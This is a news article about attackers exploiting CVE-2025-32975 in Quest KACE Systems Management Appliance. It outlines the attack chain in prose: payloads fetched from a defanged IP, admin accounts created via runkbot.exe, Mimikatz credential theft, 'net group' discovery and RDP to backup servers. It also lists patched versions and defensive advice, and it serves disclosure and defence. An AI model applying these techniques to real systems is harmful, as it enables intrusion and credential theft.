A serious cybersecurity threat has emerged as experts warn that attackers are actively exploiting a critical flaw in Quest KACE Systems Management Appliance (SMA) to gain control over unpatched systems.
The vulnerability, identified as CVE-2025-32975 with a CVSS score of 10.0, allows threat actors to bypass administrative accounts and log in as legitimate users. Although it was patched in May 2025, recent reports indicate that exploitation activity began in the second week of March 2026, mainly targeting internet-exposed SMA instances.
According to findings by cybersecurity researchers, attackers used this flaw to take over administrative accounts and execute remote commands. These commands were used to download Base64-encoded payloads from server 216.126.225[.]156.
Experts observed that attackers leveraged the “runkbot.exe” process to create additional admin accounts. This process is part of the SMA Agent and is typically used to run scripts and manage installations. PowerShell scripts were also deployed to modify Windows Registry entries, likely to maintain access or change system configurations.
Other malicious activities included credential theft using Mimikatz, system discovery by identifying logged-in users and admin accounts, and running commands like “net time” and “net group.” Attackers also gained remote access through RDP to backup systems such as Veeam and Veritas, along with domain controllers.
Cybersecurity specialists have advised organisations to avoid exposing SMA instances to the internet and to immediately apply the latest patches. Secured versions include 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
Experts caution that such attacks can go beyond system control and lead to data theft, network-wide movement, and long-term unauthorised access. “Any administrative system lacking timely patching provides cybercriminals with a direct entry point,” Arctic Wolf noted.
Organisations are also advised to monitor credentials, track registry changes, and log remote commands. Regular checks of agent and backup services are recommended to detect unusual activity early.
The incident highlights the importance of strong patch management, network segmentation, strict access controls, and continuous cybersecurity training to prevent future attacks.
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream LinkedIn | The Mainstream Facebook | The Mainstream Youtube | The Mainstream Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
